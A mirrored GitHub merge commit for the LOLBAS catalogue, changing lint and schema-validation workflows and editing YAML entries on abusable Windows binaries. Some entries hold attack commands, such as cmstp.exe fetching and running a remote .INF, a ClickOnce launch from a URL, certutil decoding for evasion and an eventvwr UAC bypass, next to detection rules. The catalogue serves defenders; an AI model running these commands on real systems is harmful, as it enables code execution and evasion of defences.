mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
Merge remote-tracking branch 'upstream/master' into windows_11_sprint
This commit is contained in:
commit
67e1040172
8
.github/.yamllint
vendored
8
.github/.yamllint
vendored
@ -4,12 +4,12 @@ yaml-files:
|
||||
- '*.yml'
|
||||
rules:
|
||||
new-line-at-end-of-file:
|
||||
level: warning
|
||||
level: error
|
||||
trailing-spaces:
|
||||
level: warning
|
||||
level: error
|
||||
line-length:
|
||||
level: warning
|
||||
new-lines:
|
||||
level: warning
|
||||
level: error
|
||||
indentation:
|
||||
level: warning
|
||||
level: error
|
||||
|
2
.github/workflows/gh-pages.yml
vendored
2
.github/workflows/gh-pages.yml
vendored
@ -16,7 +16,7 @@ jobs:
|
||||
|
||||
- name: Change .yml to .md
|
||||
run: |
|
||||
for x in $(find yml/ -name '*.yml'); do mv "$x" "${x/%\.yml/.md}"; done
|
||||
for x in $(find yml/ -name '*.yml'); do echo "---" >> "$x"; mv "$x" "${x/%\.yml/.md}"; done
|
||||
mv yml/OSBinaries yml/Binaries
|
||||
mv yml/OSLibraries yml/Libraries
|
||||
mv yml/OSScripts yml/Scripts
|
||||
|
34
.github/workflows/yaml-linting.yml
vendored
34
.github/workflows/yaml-linting.yml
vendored
@ -1,19 +1,35 @@
|
||||
---
|
||||
name: YAML Lint
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
pull_request:
|
||||
branches:
|
||||
- master
|
||||
name: PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks
|
||||
on: [push,pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v1
|
||||
- uses: actions/checkout@v3
|
||||
- name: yaml-lint
|
||||
uses: ibiqlik/action-yamllint@v3
|
||||
with:
|
||||
no_warnings: true
|
||||
file_or_dir: yml/**/*.yml
|
||||
config_file: .github/.yamllint
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
|
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
35
.github/yaml-lint-reviewdog.yml.bak
vendored
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
name: PULL_REQUEST - YAML Lint with Reviewdog & Schema Checks
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
lintFiles:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run yamllint
|
||||
uses: reviewdog/action-yamllint@v1
|
||||
with:
|
||||
level: error
|
||||
reporter: github-pr-review # Change reporter.
|
||||
yamllint_flags: '--config-file .github/.yamllint yml/**/*.yml'
|
||||
- name: Validate OSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSLibraries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSLibraries/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OSScripts YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OSScripts/*.yml
|
||||
schema: YML-Schema.yml
|
||||
- name: Validate OtherMSBinaries YAML Schema
|
||||
uses: cketti/action-pykwalify@v0.3-temp-fix
|
||||
with:
|
||||
files: yml/OtherMSBinaries/*.yml
|
||||
schema: YML-Schema.yml
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Bart
|
||||
Handle: '@bartblaze'
|
||||
---
|
||||
|
@ -15,4 +15,3 @@ Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Acknowledgement:
|
||||
Handle: '@@vysecurity'
|
||||
- Person: Adam (Internals)
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
118
YML-Schema.yml
Normal file
118
YML-Schema.yml
Normal file
@ -0,0 +1,118 @@
|
||||
---
|
||||
type: map
|
||||
mapping:
|
||||
# Id field enhancement possibility commenting out for now
|
||||
# "Id":
|
||||
# type: str
|
||||
# required: true
|
||||
# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}'
|
||||
"Name":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Aliases":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Alias":
|
||||
type: str
|
||||
required: false
|
||||
"Author":
|
||||
type: str
|
||||
required: true
|
||||
"Created":
|
||||
type: date
|
||||
required: true
|
||||
"Commands":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Command":
|
||||
type: str
|
||||
required: true
|
||||
"Description":
|
||||
type: str
|
||||
required: true
|
||||
"Usecase":
|
||||
type: str
|
||||
required: true
|
||||
"Category":
|
||||
type: str
|
||||
required: true
|
||||
enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload]
|
||||
"Privileges":
|
||||
type: str
|
||||
required: true
|
||||
"MitreID":
|
||||
type: str
|
||||
required: true
|
||||
pattern: '^T[0-9]{4}(\.[0-9]{3})?$'
|
||||
"OperatingSystem":
|
||||
type: str
|
||||
required: true
|
||||
"Full_Path":
|
||||
type: seq
|
||||
required: true
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Path":
|
||||
type: str
|
||||
required: true
|
||||
"Code_Sample":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Code":
|
||||
type: str
|
||||
"Detection":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"IOC":
|
||||
type: str
|
||||
"Sigma":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Analysis":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Elastic":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Splunk":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"BlockRule":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Resources":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Link":
|
||||
type: str
|
||||
pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$'
|
||||
"Acknowledgement":
|
||||
type: seq
|
||||
required: false
|
||||
sequence:
|
||||
- type: map
|
||||
mapping:
|
||||
"Person":
|
||||
type: str
|
||||
"Handle":
|
||||
type: str
|
||||
pattern: '^(@(\w){1,15})?$'
|
@ -1,11 +1,15 @@
|
||||
---
|
||||
Name: Binary.exe
|
||||
Description: Something general about the binary
|
||||
Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality,
|
||||
- Alias: Binary64.exe # but for example, is built for different architecture.
|
||||
Author: The name of the person that created this file
|
||||
Created: YYYY-MM-DD (date the person created this file)
|
||||
Commands:
|
||||
- Command: The command
|
||||
Description: Description of the command
|
||||
Aliases:
|
||||
- An alias for the command (example: ProcDump.exe & ProcDump64.exe)
|
||||
Usecase: A description of the usecase
|
||||
Category: Execute
|
||||
Privileges: Required privs
|
||||
|
@ -20,4 +20,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
@ -23,7 +23,7 @@ Detection:
|
||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||
Resources:
|
||||
- Link: https://freddiebarrsmith.com/at.txt
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
|
||||
- Link: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
|
||||
- Link: https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
||||
Acknowledgement:
|
||||
- Person: 'Freddie Barr-Smith'
|
||||
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/eb406ba36fc607986970c09e53058af412093647/rules/windows/process_creation/win_susp_atbroker.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/7bca85e40618126643b9712b80bd663c21908e26/rules/windows/registry_event/sysmon_susp_atbroker_change.yml
|
||||
@ -27,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -48,4 +48,3 @@ Acknowledgement:
|
||||
Handle: '@aionescu'
|
||||
- Person: Asif Matadar
|
||||
Handle: '@d1r4c'
|
||||
---
|
||||
|
@ -46,7 +46,7 @@ Detection:
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
Resources:
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
|
||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
@ -56,4 +56,3 @@ Acknowledgement:
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ensar Samil
|
||||
Handle: '@sblmsrsn'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: David Middlehurst
|
||||
Handle: '@dtmsecurity'
|
||||
---
|
||||
|
@ -39,7 +39,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||
- Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName
|
||||
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
@ -75,4 +75,3 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Lior Adar
|
||||
---
|
||||
|
@ -21,8 +21,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmd.exe
|
||||
- Path: C:\Windows\SysWOW64\cmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/688df3405afd778d63a2ea36a084344a2052848c/rules/windows/process_creation/process_creation_alternate_data_streams.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml
|
||||
@ -34,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: r0lan
|
||||
Handle: '@yeyint_mth'
|
||||
---
|
||||
|
@ -14,8 +14,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c3c152d457773454f67895008a1abde823be0755/rules/windows/process_creation/win_cmdkey_recon.yml
|
||||
Resources:
|
||||
@ -24,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -23,4 +23,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -14,15 +14,13 @@ Commands:
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml
|
||||
@ -44,4 +42,3 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
||||
|
@ -29,4 +29,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Wietze
|
||||
Handle: '@wietze'
|
||||
---
|
||||
|
@ -15,7 +15,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml
|
||||
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -22,7 +22,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml
|
||||
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
23
yml/OSBinaries/CustomShellHost.yml
Normal file
23
yml/OSBinaries/CustomShellHost.yml
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
Name: CustomShellHost.exe
|
||||
Description: A host process that is used by custom shells when using Windows in Kiosk mode.
|
||||
Author: 'Wietze Beukema'
|
||||
Created: 2021-11-14
|
||||
Commands:
|
||||
- Command: CustomShellHost.exe
|
||||
Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.
|
||||
Usecase: Can be used to evade defensive counter-measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\CustomShellHost.exe
|
||||
Detection:
|
||||
- IOC: CustomShellHost.exe is unlikely to run on normal workstations
|
||||
Resources:
|
||||
- Link: https://twitter.com/YoSignals/status/1381353520088113154
|
||||
- Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher
|
||||
Acknowledgement:
|
||||
- Person: John Carroll
|
||||
Handle: '@YoSignals'
|
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
||||
|
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Gal Kristal
|
||||
Handle: '@gal_kristal'
|
||||
---
|
||||
|
20
yml/OSBinaries/DeviceCredentialDeployment.yml
Normal file
20
yml/OSBinaries/DeviceCredentialDeployment.yml
Normal file
@ -0,0 +1,20 @@
|
||||
---
|
||||
Name: DeviceCredentialDeployment.exe
|
||||
Description: Device Credential Deployment
|
||||
Author: 'Elliot Killick'
|
||||
Created: '2021-08-16'
|
||||
Commands:
|
||||
- Command: DeviceCredentialDeployment
|
||||
Description: Grab the console window handle and set it to hidden
|
||||
Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background
|
||||
Category: Conceal
|
||||
Privileges: User
|
||||
MitreID: T1564
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\DeviceCredentialDeployment.exe
|
||||
Detection:
|
||||
- IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@ -17,7 +17,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
Resources:
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
||||
Handle: '@tim8288'
|
||||
- Person: Hai Vaknin
|
||||
Handle: '@vakninhai'
|
||||
---
|
||||
|
@ -22,7 +22,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -15,7 +15,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
|
||||
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
|
||||
@ -32,4 +32,3 @@ Acknowledgement:
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
||||
|
@ -51,7 +51,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
|
||||
@ -67,5 +67,4 @@ Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
- Person: Mike Cary
|
||||
Handle: 'grayfold3d'
|
||||
---
|
||||
Handle: '@grayfold3d'
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: eventvwr.exe
|
||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Category: UAC Bypass
|
||||
Privileges: User
|
||||
MitreID: T1548.002
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@enigma0x3'
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -29,7 +29,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
|
||||
@ -41,4 +41,3 @@ Acknowledgement:
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
||||
Handle: '@CyberRaiju'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description:
|
||||
Description: Load a DLL located in the c:\test folder with a specific name.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description:
|
||||
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -54,4 +54,3 @@ Acknowledgement:
|
||||
Handle: '@VakninHai'
|
||||
- Person: Tamir Yehuda
|
||||
Handle: '@tim8288'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Findstr.exe
|
||||
Description:
|
||||
Description: Write to ADS, discover, or download files with Findstr.exe
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -36,7 +36,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
|
||||
Resources:
|
||||
@ -45,4 +45,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Acknowledgement:
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Carlos Perez
|
||||
Handle: '@Carlos_Perez'
|
||||
---
|
||||
|
@ -22,7 +22,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
||||
Resources:
|
||||
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@vector_sec'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -22,7 +22,7 @@ Full_Path:
|
||||
- Path: C:\Windows\System32\ftp.exe
|
||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
|
||||
- IOC: cmd /c as child process of ftp.exe
|
||||
@ -37,5 +37,4 @@ Acknowledgement:
|
||||
- Person: BennyHusted
|
||||
Handle: ''
|
||||
- Person: Amit Serper
|
||||
Handle: '@0xAmit '
|
||||
---
|
||||
Handle: '@0xAmit'
|
||||
|
@ -176,4 +176,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jesus Galvez
|
||||
Handle:
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
